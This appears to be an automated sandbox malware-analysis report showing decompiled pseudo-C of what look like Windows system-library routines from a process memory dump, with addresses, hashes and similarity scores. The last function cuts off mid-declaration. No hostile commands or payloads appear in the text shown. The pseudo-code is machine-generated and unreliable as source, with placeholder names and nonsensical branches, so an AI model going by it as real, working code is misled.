                                                                      0x00000000
                                                                      0x00a2fc36
                                                                      0x00a2fc38
                                                                      0x00a2fc3b
                                                                      0x00a2fc41
                                                                      0x00a6bf17
                                                                      0x00a6bf19
                                                                      0x00a6bf48
                                                                      0x00a6bf4b
                                                                      0x00000000
                                                                      0x00a6bf1b
                                                                      0x00a6bf22
                                                                      0x00a6bf24
                                                                      0x00a6bf26
                                                                      0x00000000
                                                                      0x00a6bf2c
                                                                      0x00a6bf37
                                                                      0x00a6bf39
                                                                      0x00a6bf3b
                                                                      0x00000000
                                                                      0x00a6bf41
                                                                      0x00a6bf41
                                                                      0x00a6bf41
                                                                      0x00a6bf41
                                                                      0x00a6bf45
                                                                      0x00000000
                                                                      0x00a6bf45
                                                                      0x00a6bf3b
                                                                      0x00a6bf26
                                                                      0x00000000
                                                                      0x00a2fc47
                                                                      0x00a2fc47
                                                                      0x00a2fc49
                                                                      0x00a2fcb2
                                                                      0x00a2fcb4
                                                                      0x00a2fcb6
                                                                      0x00a2fcdc
                                                                      0x00a2fcdc
                                                                      0x00000000
                                                                      0x00a2fcb8
                                                                      0x00a2fcc3
                                                                      0x00a2fcc5
                                                                      0x00a2fcc7
                                                                      0x00000000
                                                                      0x00a2fcc9
                                                                      0x00a2fcc9
                                                                      0x00a2fccd
                                                                      0x00000000
                                                                      0x00a2fccd
                                                                      0x00a2fcc7
                                                                      0x00000000
                                                                      0x00a2fc4b
                                                                      0x00a2fc4b
                                                                      0x00a2fc4e
                                                                      0x00a2fc4e
                                                                      0x00a2fc51
                                                                      0x00a2fc51
                                                                      0x00a2fc54
                                                                      0x00a2fc5a
                                                                      0x00a2fc5c
                                                                      0x00a2fc5f
                                                                      0x00a2fc61
                                                                      0x00a2fc63
                                                                      0x00a2fc65
                                                                      0x00a2fc67
                                                                      0x00a2fc6e
                                                                      0x00a2fc72
                                                                      0x00a2fc72
                                                                      0x00a2fc72
                                                                      0x00a2fc72
                                                                      0x00a2fc67
                                                                      0x00a2fc61
                                                                      0x00000000
                                                                      0x00a2fc5a
                                                                      0x00a2fc49
                                                                      0x00a2fc41
                                                                      0x00a2fc30
                                                                      0x00a2fc27
                                                                      0x00a2fc03
                                                                      0x00a2fbcd
                                                                      0x00a2fbd3
                                                                      0x00a2fbd9
                                                                      0x00a2fbdc
                                                                      0x00a2fbde
                                                                      0x00a2fc99
                                                                      0x00a2fc9b
                                                                      0x00a2fc9d
                                                                      0x00a2fcd5
                                                                      0x00a2fcd5
                                                                      0x00a2fc89
                                                                      0x00a2fc89
                                                                      0x00000000
                                                                      0x00a2fc9f
                                                                      0x00a2fc9f
                                                                      0x00a2fca3
                                                                      0x00000000
                                                                      0x00a2fca3
                                                                      0x00000000
                                                                      0x00a2fbe4
                                                                      0x00a2fbe4
                                                                      0x00a2fbe4
                                                                      0x00a2fbe4
                                                                      0x00a2fbe9
                                                                      0x00a2fbf2
                                                                      0x00000000
                                                                      0x00a2fbf2
                                                                      0x00a2fbde
                                                                      0x00a2fbcb
                                                                      0x00a2fbab
                                                                      0x00a2fc8b
                                                                      0x00a2fc8b
                                                                      0x00a2fc8c
                                                                      0x00a2fb80
                                                                      0x00a2fb72
                                                                      0x00a2fb5e
                                                                      0x00a2fc8d
                                                                      0x00a2fc91
                                                                      0x00a2fadf
                                                                      0x00a2fadf
                                                                      0x00a2fae1
                                                                      0x00a2fae4
                                                                      0x00a2fae7
                                                                      0x00a2faec
                                                                      0x00a2faf8
                                                                      0x00a2fb00
                                                                      0x00a2fb07
                                                                      0x00a2fb0f
                                                                      0x00a2fb0f
                                                                      0x00a2fb07
                                                                      0x00000000
                                                                      0x00a2faf8
                                                                      0x00a2fadd

                                                                      Strings
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00A6BE0F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                      • API String ID: 0-865735534
                                                                      • Opcode ID: e76d39afb589a9bf9c86bb25e9cd8720c083aebc838a8f96cdba42b105c875da
                                                                      • Instruction ID: e2a8be74bb1f81f2ea4bac4808596ca5c626c2d4d501951537675534253461dc
                                                                      • Opcode Fuzzy Hash: e76d39afb589a9bf9c86bb25e9cd8720c083aebc838a8f96cdba42b105c875da
                                                                      • Instruction Fuzzy Hash: 28A1EF71B0062ACFDB25DB6CD950BBAB3B5AF48710F14457AE906DB691EB30DC41CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 63%
                                                                      			E009F2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                      				signed char _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				signed int _v52;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t55;
                                                                      				signed int _t57;
                                                                      				signed int _t58;
                                                                      				char* _t62;
                                                                      				signed char* _t63;
                                                                      				signed char* _t64;
                                                                      				signed int _t67;
                                                                      				signed int _t72;
                                                                      				signed int _t77;
                                                                      				signed int _t78;
                                                                      				signed int _t88;
                                                                      				intOrPtr _t89;
                                                                      				signed char _t93;
                                                                      				signed int _t97;
                                                                      				signed int _t98;
                                                                      				signed int _t102;
                                                                      				signed int _t103;
                                                                      				intOrPtr _t104;
                                                                      				signed int _t105;
                                                                      				signed int _t106;
                                                                      				signed char _t109;
                                                                      				signed int _t111;
                                                                      				void* _t116;
                                                                      
                                                                      				_t102 = __edi;
                                                                      				_t97 = __edx;
                                                                      				_v12 = _v12 & 0x00000000;
                                                                      				_t55 =  *[fs:0x18];
                                                                      				_t109 = __ecx;
                                                                      				_v8 = __edx;
                                                                      				_t86 = 0;
                                                                      				_v32 = _t55;
                                                                      				_v24 = 0;
                                                                      				_push(__edi);
                                                                      				if(__ecx == 0xae5350) {
                                                                      					_t86 = 1;
                                                                      					_v24 = 1;
                                                                      					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                      				}
                                                                      				_t103 = _t102 | 0xffffffff;
                                                                      				if( *0xae7bc8 != 0) {
                                                                      					_push(0xc000004b);
                                                                      					_push(_t103);
                                                                      					E00A397C0();
                                                                      				}
                                                                      				if( *0xae79c4 != 0) {
                                                                      					_t57 = 0;
                                                                      				} else {
                                                                      					_t57 = 0xae79c8;
                                                                      				}
                                                                      				_v16 = _t57;
                                                                      				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                      					_t93 = _t109;
                                                                      					L23();
                                                                      				}
                                                                      				_t58 =  *_t109;
                                                                      				if(_t58 == _t103) {
                                                                      					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                      					_t58 = _t103;
                                                                      					if(__eflags == 0) {
                                                                      						_t93 = _t109;
                                                                      						E00A21624(_t86, __eflags);
                                                                      						_t58 =  *_t109;
                                                                      					}
                                                                      				}
                                                                      				_v20 = _v20 & 0x00000000;
                                                                      				if(_t58 != _t103) {
                                                                      					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                      				}
                                                                      				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                      				_t88 = _v16;
                                                                      				_v28 = _t104;
                                                                      				L9:
                                                                      				while(1) {
                                                                      					if(E00A17D50() != 0) {
                                                                      						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                      					} else {
                                                                      						_t62 = 0x7ffe0382;
                                                                      					}
                                                                      					if( *_t62 != 0) {
                                                                      						_t63 =  *[fs:0x30];
                                                                      						__eflags = _t63[0x240] & 0x00000002;
                                                                      						if((_t63[0x240] & 0x00000002) != 0) {
                                                                      							_t93 = _t109;
                                                                      							E00A8FE87(_t93);
                                                                      						}
                                                                      					}
                                                                      					if(_t104 != 0xffffffff) {
                                                                      						_push(_t88);
                                                                      						_push(0);
                                                                      						_push(_t104);
                                                                      						_t64 = E00A39520();
                                                                      						goto L15;
                                                                      					} else {
                                                                      						while(1) {
                                                                      							_t97 =  &_v8;
                                                                      							_t64 = E00A2E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                      							if(_t64 == 0x102) {
                                                                      								break;
                                                                      							}
                                                                      							_t93 =  *(_t109 + 4);
                                                                      							_v8 = _t93;
                                                                      							if((_t93 & 0x00000002) != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							L15:
                                                                      							if(_t64 == 0x102) {
                                                                      								break;
                                                                      							}
                                                                      							_t89 = _v24;
                                                                      							if(_t64 < 0) {
                                                                      								L00A4DF30(_t93, _t97, _t64);
                                                                      								_push(_t93);
                                                                      								_t98 = _t97 | 0xffffffff;
                                                                      								__eflags =  *0xae6901;
                                                                      								_push(_t109);
                                                                      								_v52 = _t98;
                                                                      								if( *0xae6901 != 0) {
                                                                      									_push(0);
                                                                      									_push(1);
                                                                      									_push(0);
                                                                      									_push(0x100003);
                                                                      									_push( &_v12);
                                                                      									_t72 = E00A39980();
                                                                      									__eflags = _t72;
                                                                      									if(_t72 < 0) {
                                                                      										_v12 = _t98 | 0xffffffff;
                                                                      									}
                                                                      								}
                                                                      								asm("lock cmpxchg [ecx], edx");
                                                                      								_t111 = 0;
                                                                      								__eflags = 0;
                                                                      								if(0 != 0) {
                                                                      									__eflags = _v12 - 0xffffffff;
                                                                      									if(_v12 != 0xffffffff) {
                                                                      										_push(_v12);
                                                                      										E00A395D0();
                                                                      									}
                                                                      								} else {
                                                                      									_t111 = _v12;
                                                                      								}
                                                                      								return _t111;
                                                                      							} else {
                                                                      								if(_t89 != 0) {
                                                                      									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                      									_t77 = E00A17D50();
                                                                      									__eflags = _t77;
                                                                      									if(_t77 == 0) {
                                                                      										_t64 = 0x7ffe0384;
                                                                      									} else {
                                                                      										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                      									}
                                                                      									__eflags =  *_t64;
                                                                      									if( *_t64 != 0) {
                                                                      										_t64 =  *[fs:0x30];
                                                                      										__eflags = _t64[0x240] & 0x00000004;
                                                                      										if((_t64[0x240] & 0x00000004) != 0) {
                                                                      											_t78 = E00A17D50();
                                                                      											__eflags = _t78;
                                                                      											if(_t78 == 0) {
                                                                      												_t64 = 0x7ffe0385;
                                                                      											} else {
                                                                      												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                      											}
                                                                      											__eflags =  *_t64 & 0x00000020;
                                                                      											if(( *_t64 & 0x00000020) != 0) {
                                                                      												_t64 = E00A77016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								return _t64;
                                                                      							}
                                                                      						}
                                                                      						_t97 = _t88;
                                                                      						_t93 = _t109;
                                                                      						E00A8FDDA(_t97, _v12);
                                                                      						_t105 =  *_t109;
                                                                      						_t67 = _v12 + 1;
                                                                      						_v12 = _t67;
                                                                      						__eflags = _t105 - 0xffffffff;
                                                                      						if(_t105 == 0xffffffff) {
                                                                      							_t106 = 0;
                                                                      							__eflags = 0;
                                                                      						} else {
                                                                      							_t106 =  *(_t105 + 0x14);
                                                                      						}
                                                                      						__eflags = _t67 - 2;
                                                                      						if(_t67 > 2) {
                                                                      							__eflags = _t109 - 0xae5350;
                                                                      							if(_t109 != 0xae5350) {
                                                                      								__eflags = _t106 - _v20;
                                                                      								if(__eflags == 0) {
                                                                      									_t93 = _t109;
                                                                      									E00A8FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_push("RTL: Re-Waiting\n");
                                                                      						_push(0);
                                                                      						_push(0x65);
                                                                      						_v20 = _t106;
                                                                      						E00A85720();
                                                                      						_t104 = _v28;
                                                                      						_t116 = _t116 + 0xc;
                                                                      						continue;
                                                                      					}
                                                                      				}
                                                                      			}




































                                                                      0x009f2d8a
                                                                      0x009f2d8a
                                                                      0x009f2d92
                                                                      0x009f2d96
                                                                      0x009f2d9e
                                                                      0x009f2da0
                                                                      0x009f2da3
                                                                      0x009f2da5
                                                                      0x009f2da8
                                                                      0x009f2dab
                                                                      0x009f2db2
                                                                      0x00a4f9aa
                                                                      0x00a4f9ab
                                                                      0x00a4f9ae
                                                                      0x00a4f9ae
                                                                      0x009f2db8
                                                                      0x009f2dc2
                                                                      0x00a4f9b9
                                                                      0x00a4f9be
                                                                      0x00a4f9bf
                                                                      0x00a4f9bf
                                                                      0x009f2dcf
                                                                      0x00a4f9c9
                                                                      0x009f2dd5
                                                                      0x009f2dd5
                                                                      0x009f2dd5
                                                                      0x009f2dde
                                                                      0x009f2de1
                                                                      0x009f2e70
                                                                      0x009f2e72
                                                                      0x009f2e72
                                                                      0x009f2de7
                                                                      0x009f2deb
                                                                      0x009f2e7c
                                                                      0x009f2e83
                                                                      0x009f2e85
                                                                      0x009f2e8b
                                                                      0x009f2e8d
                                                                      0x009f2e92
                                                                      0x009f2e92
                                                                      0x009f2e85
                                                                      0x009f2df1
                                                                      0x009f2df7
                                                                      0x009f2df9
                                                                      0x009f2df9
                                                                      0x009f2dfc
                                                                      0x009f2dff
                                                                      0x009f2e02
                                                                      0x00000000
                                                                      0x009f2e05
                                                                      0x009f2e0c
                                                                      0x00a4f9d9
                                                                      0x009f2e12
                                                                      0x009f2e12
                                                                      0x009f2e12
                                                                      0x009f2e1a
                                                                      0x00a4f9e3
                                                                      0x00a4f9e9
                                                                      0x00a4f9f0
                                                                      0x00a4f9f6
                                                                      0x00a4f9f8
                                                                      0x00a4f9f8
                                                                      0x00a4f9f0
                                                                      0x009f2e23
                                                                      0x00a4fa02
                                                                      0x00a4fa03
                                                                      0x00a4fa05
                                                                      0x00a4fa06
                                                                      0x00000000
                                                                      0x009f2e29
                                                                      0x009f2e29
                                                                      0x009f2e2e
                                                                      0x009f2e34
                                                                      0x009f2e3e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009f2e44
                                                                      0x009f2e47
                                                                      0x009f2e4d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009f2e4f
                                                                      0x009f2e54
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009f2e5a
                                                                      0x009f2e5f
                                                                      0x009f2e9a
                                                                      0x009f2ea4
                                                                      0x009f2ea5
                                                                      0x009f2ea8
                                                                      0x009f2eaf
                                                                      0x009f2eb2
                                                                      0x009f2eb5
                                                                      0x00a4fae9
                                                                      0x00a4faeb
                                                                      0x00a4faed
                                                                      0x00a4faef
                                                                      0x00a4faf7
                                                                      0x00a4faf8
                                                                      0x00a4fafd
                                                                      0x00a4faff
                                                                      0x00a4fb04
                                                                      0x00a4fb04
                                                                      0x00a4faff
                                                                      0x009f2ec0
                                                                      0x009f2ec4
                                                                      0x009f2ec6
                                                                      0x009f2ec8
                                                                      0x00a4fb14
                                                                      0x00a4fb18
                                                                      0x00a4fb1e
                                                                      0x00a4fb21
                                                                      0x00a4fb21
                                                                      0x009f2ece
                                                                      0x009f2ece
                                                                      0x009f2ece
                                                                      0x009f2ed7
                                                                      0x009f2e61
                                                                      0x009f2e63
                                                                      0x00a4fa6b
                                                                      0x00a4fa71
                                                                      0x00a4fa76
                                                                      0x00a4fa78
                                                                      0x00a4fa8a
                                                                      0x00a4fa7a
                                                                      0x00a4fa83
                                                                      0x00a4fa83
                                                                      0x00a4fa8f
                                                                      0x00a4fa91
                                                                      0x00a4fa97
                                                                      0x00a4fa9d
                                                                      0x00a4faa4
                                                                      0x00a4faaa
                                                                      0x00a4faaf
                                                                      0x00a4fab1
                                                                      0x00a4fac3
                                                                      0x00a4fab3
                                                                      0x00a4fabc
                                                                      0x00a4fabc
                                                                      0x00a4fac8
                                                                      0x00a4facb
                                                                      0x00a4fadf
                                                                      0x00a4fadf
                                                                      0x00a4facb
                                                                      0x00a4faa4
                                                                      0x00a4fa91
                                                                      0x009f2e6f
                                                                      0x009f2e6f
                                                                      0x009f2e5f
                                                                      0x00a4fa13
                                                                      0x00a4fa15
                                                                      0x00a4fa17
                                                                      0x00a4fa1f
                                                                      0x00a4fa21
                                                                      0x00a4fa22
                                                                      0x00a4fa25
                                                                      0x00a4fa28
                                                                      0x00a4fa2f
                                                                      0x00a4fa2f
                                                                      0x00a4fa2a
                                                                      0x00a4fa2a
                                                                      0x00a4fa2a
                                                                      0x00a4fa31
                                                                      0x00a4fa34
                                                                      0x00a4fa36
                                                                      0x00a4fa3c
                                                                      0x00a4fa3e
                                                                      0x00a4fa41
                                                                      0x00a4fa43
                                                                      0x00a4fa45
                                                                      0x00a4fa45
                                                                      0x00a4fa41
                                                                      0x00a4fa3c
                                                                      0x00a4fa4a
                                                                      0x00a4fa4f
                                                                      0x00a4fa51
                                                                      0x00a4fa53
                                                                      0x00a4fa56
                                                                      0x00a4fa5b
                                                                      0x00a4fa5e
                                                                      0x00000000
                                                                      0x00a4fa5e
                                                                      0x009f2e23

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Re-Waiting
                                                                      • API String ID: 0-316354757
                                                                      • Opcode ID: 1acafabf442012525da52ad4367e38dc597eb2488d84a600095b88458d50f965
                                                                      • Instruction ID: 03f6f4e0d277634e537534d56df1b1d66a7d58d32b6cac029fe5db22eb1df088
                                                                      • Opcode Fuzzy Hash: 1acafabf442012525da52ad4367e38dc597eb2488d84a600095b88458d50f965
                                                                      • Instruction Fuzzy Hash: 24615431A00648AFDB31DF68C984B7EB7B4EF84354F24067AEA159B2C2C7349D41C781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E009F52A5(char __ecx) {
                                                                      				char _v20;
                                                                      				char _v28;
                                                                      				char _v29;
                                                                      				void* _v32;
                                                                      				void* _v36;
                                                                      				void* _v37;
                                                                      				void* _v38;
                                                                      				void* _v40;
                                                                      				void* _v46;
                                                                      				void* _v64;
                                                                      				void* __ebx;
                                                                      				intOrPtr* _t49;
                                                                      				signed int _t53;
                                                                      				short _t85;
                                                                      				signed int _t87;
                                                                      				signed int _t88;
                                                                      				signed int _t89;
                                                                      				intOrPtr _t101;
                                                                      				intOrPtr* _t102;
                                                                      				intOrPtr* _t104;
                                                                      				signed int _t106;
                                                                      				void* _t108;
                                                                      
                                                                      				_t93 = __ecx;
                                                                      				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                      				_push(_t88);
                                                                      				_v29 = __ecx;
                                                                      				_t89 = _t88 | 0xffffffff;
                                                                      				while(1) {
                                                                      					E00A0EEF0(0xae79a0);
                                                                      					_t104 =  *0xae8210; // 0x4c2c78
                                                                      					if(_t104 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					asm("lock inc dword [esi]");
                                                                      					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                                      					E00A0EB70(_t93, 0xae79a0);
                                                                      					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                      						_t101 =  *0x7ffe02dc;
                                                                      						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                      						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                      							L9:
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0x90028);
                                                                      							_push(_t108 + 0x20);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push( *((intOrPtr*)(_t104 + 4)));
                                                                      							_t53 = E00A39890();
                                                                      							__eflags = _t53;
                                                                      							if(_t53 >= 0) {
                                                                      								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                      								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                      									E00A0EEF0(0xae79a0);
                                                                      									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                      									E00A0EB70(0, 0xae79a0);
                                                                      								}
                                                                      								goto L3;
                                                                      							}
                                                                      							__eflags = _t53 - 0xc0000012;
                                                                      							if(__eflags == 0) {
                                                                      								L12:
                                                                      								_t13 = _t104 + 0xc; // 0x4c2c85
                                                                      								_t93 = _t13;
                                                                      								 *((char*)(_t108 + 0x12)) = 0;
                                                                      								__eflags = E00A2F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                      								if(__eflags >= 0) {
                                                                      									L15:
                                                                      									_t102 = _v28;
                                                                      									 *_t102 = 2;
                                                                      									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                      									E00A0EEF0(0xae79a0);
                                                                      									__eflags =  *0xae8210 - _t104; // 0x4c2c78
                                                                      									if(__eflags == 0) {
                                                                      										__eflags =  *((char*)(_t108 + 0xe));
                                                                      										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                      										 *0xae8210 = _t102;
                                                                      										_t32 = _t102 + 0xc; // 0x0
                                                                      										 *_t95 =  *_t32;
                                                                      										_t33 = _t102 + 0x10; // 0x0
                                                                      										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                      										_t35 = _t102 + 4; // 0xffffffff
                                                                      										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                      										if(__eflags != 0) {
                                                                      											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                                      											E00A74888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                                      										}
                                                                      										E00A0EB70(_t95, 0xae79a0);
                                                                      										asm("lock xadd [esi], eax");
                                                                      										if(__eflags == 0) {
                                                                      											_push( *((intOrPtr*)(_t104 + 4)));
                                                                      											E00A395D0();
                                                                      											L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                      											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                      										}
                                                                      										asm("lock xadd [esi], ebx");
                                                                      										__eflags = _t89 == 1;
                                                                      										if(_t89 == 1) {
                                                                      											_push( *((intOrPtr*)(_t104 + 4)));
                                                                      											E00A395D0();
                                                                      											L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                      											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                      										}
                                                                      										_t49 = _t102;
                                                                      										L4:
                                                                      										return _t49;
                                                                      									}
                                                                      									E00A0EB70(_t93, 0xae79a0);
                                                                      									asm("lock xadd [esi], eax");
                                                                      									if(__eflags == 0) {
                                                                      										_push( *((intOrPtr*)(_t104 + 4)));
                                                                      										E00A395D0();
                                                                      										L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                      										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                      									}
                                                                      									 *_t102 = 1;
                                                                      									asm("lock xadd [edi], eax");
                                                                      									if(__eflags == 0) {
                                                                      										_t28 = _t102 + 4; // 0xffffffff
                                                                      										_push( *_t28);
                                                                      										E00A395D0();
                                                                      										L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                      									}
                                                                      									continue;
                                                                      								}
                                                                      								_t93 =  &_v20;
                                                                      								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                                      								_t85 = 6;
                                                                      								_v20 = _t85;
                                                                      								_t87 = E00A2F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                      								__eflags = _t87;
                                                                      								if(_t87 < 0) {
                                                                      									goto L3;
                                                                      								}
                                                                      								 *((char*)(_t108 + 0xe)) = 1;
                                                                      								goto L15;
                                                                      							}
                                                                      							__eflags = _t53 - 0xc000026e;
                                                                      							if(__eflags != 0) {
                                                                      								goto L3;
                                                                      							}
                                                                      							goto L12;
                                                                      						}
                                                                      						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                      						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                      							goto L3;
                                                                      						} else {
                                                                      							goto L9;
                                                                      						}
                                                                      					}
                                                                      					L3:
                                                                      					_t49 = _t104;
                                                                      					goto L4;
                                                                      				}
                                                                      				_t49 = 0;
                                                                      				goto L4;
                                                                      			}

























                                                                      0x009f52a5
                                                                      0x009f52ad
                                                                      0x009f52b0
                                                                      0x009f52b3
                                                                      0x009f52b7
                                                                      0x009f52ba
                                                                      0x009f52bf
                                                                      0x009f52c4
                                                                      0x009f52cc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009f52ce
                                                                      0x009f52d9
                                                                      0x009f52dd
                                                                      0x009f52e7
                                                                      0x009f52f7
                                                                      0x009f52f9
                                                                      0x009f52fd
                                                                      0x00a50dcf
                                                                      0x00a50dd5
                                                                      0x00a50dd6
                                                                      0x00a50dd7
                                                                      0x00a50dd8
                                                                      0x00a50dd9
                                                                      0x00a50dde
                                                                      0x00a50ddf
                                                                      0x00a50de0
                                                                      0x00a50de1
                                                                      0x00a50de2
                                                                      0x00a50de5
                                                                      0x00a50dea
                                                                      0x00a50dec
                                                                      0x00a50f60
                                                                      0x00a50f64
                                                                      0x00a50f70
                                                                      0x00a50f76
                                                                      0x00a50f79
                                                                      0x00a50f79
                                                                      0x00000000
                                                                      0x00a50f64
                                                                      0x00a50df2
                                                                      0x00a50df7
                                                                      0x00a50e04
                                                                      0x00a50e0d
                                                                      0x00a50e0d
                                                                      0x00a50e10
                                                                      0x00a50e1a
                                                                      0x00a50e1c
                                                                      0x00a50e4c
                                                                      0x00a50e52
                                                                      0x00a50e61
                                                                      0x00a50e67
                                                                      0x00a50e6b
                                                                      0x00a50e70
                                                                      0x00a50e76
                                                                      0x00a50ed7
                                                                      0x00a50edc
                                                                      0x00a50ee0
                                                                      0x00a50ee6
                                                                      0x00a50eea
                                                                      0x00a50eed
                                                                      0x00a50ef0
                                                                      0x00a50ef3
                                                                      0x00a50ef6
                                                                      0x00a50ef9
                                                                      0x00a50efe
                                                                      0x00a50f01
                                                                      0x00a50f01
                                                                      0x00a50f0b
                                                                      0x00a50f12
                                                                      0x00a50f16
                                                                      0x00a50f18
                                                                      0x00a50f1b
                                                                      0x00a50f2c
                                                                      0x00a50f31
                                                                      0x00a50f31
                                                                      0x00a50f35
                                                                      0x00a50f39
                                                                      0x00a50f3a
                                                                      0x00a50f3c
                                                                      0x00a50f3f
                                                                      0x00a50f50
                                                                      0x00a50f55
                                                                      0x00a50f55
                                                                      0x00a50f59
                                                                      0x009f52eb
                                                                      0x009f52f1
                                                                      0x009f52f1
                                                                      0x00a50e7d
                                                                      0x00a50e84
                                                                      0x00a50e88
                                                                      0x00a50e8a
                                                                      0x00a50e8d
                                                                      0x00a50e9e
                                                                      0x00a50ea3
                                                                      0x00a50ea3
                                                                      0x00a50ea7
                                                                      0x00a50eaf
                                                                      0x00a50eb3
                                                                      0x00a50eb9
                                                                      0x00a50eb9
                                                                      0x00a50ebc
                                                                      0x00a50ecd
                                                                      0x00a50ecd
                                                                      0x00000000
                                                                      0x00a50eb3
                                                                      0x00a50e21
                                                                      0x00a50e2b
                                                                      0x00a50e2f
                                                                      0x00a50e30
                                                                      0x00a50e3a
                                                                      0x00a50e3f
                                                                      0x00a50e41
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a50e47
                                                                      0x00000000
                                                                      0x00a50e47
                                                                      0x00a50df9
                                                                      0x00a50dfe
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a50dfe
                                                                      0x009f5303
                                                                      0x009f5307
                                                                      0x00000000
                                                                      0x009f5309
                                                                      0x00000000
                                                                      0x009f5309
                                                                      0x009f5307
                                                                      0x009f52e9
                                                                      0x009f52e9
                                                                      0x00000000
                                                                      0x009f52e9
                                                                      0x009f530e
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: x,L
                                                                      • API String ID: 0-3824715503
                                                                      • Opcode ID: 200c6cc5f326c503629c722495d28b0f79ac41caf52572a7766eef24b48e353b
                                                                      • Instruction ID: cf5a337ff296f1e422231094c566a19517bbb481aa88285056c0a7544544ca88
                                                                      • Opcode Fuzzy Hash: 200c6cc5f326c503629c722495d28b0f79ac41caf52572a7766eef24b48e353b
                                                                      • Instruction Fuzzy Hash: 4451DF31205745ABC321DF68CA42B6BB7E4FF54710F104D1DF9A587692E774E848C792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00AC0EA5(void* __ecx, void* __edx) {
                                                                      				signed int _v20;
                                                                      				char _v24;
                                                                      				intOrPtr _v28;
                                                                      				unsigned int _v32;
                                                                      				signed int _v36;
                                                                      				intOrPtr _v40;
                                                                      				char _v44;
                                                                      				intOrPtr _v64;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				signed int _t58;
                                                                      				unsigned int _t60;
                                                                      				intOrPtr _t62;
                                                                      				char* _t67;
                                                                      				char* _t69;
                                                                      				void* _t80;
                                                                      				void* _t83;
                                                                      				intOrPtr _t93;
                                                                      				intOrPtr _t115;
                                                                      				char _t117;
                                                                      				void* _t120;
                                                                      
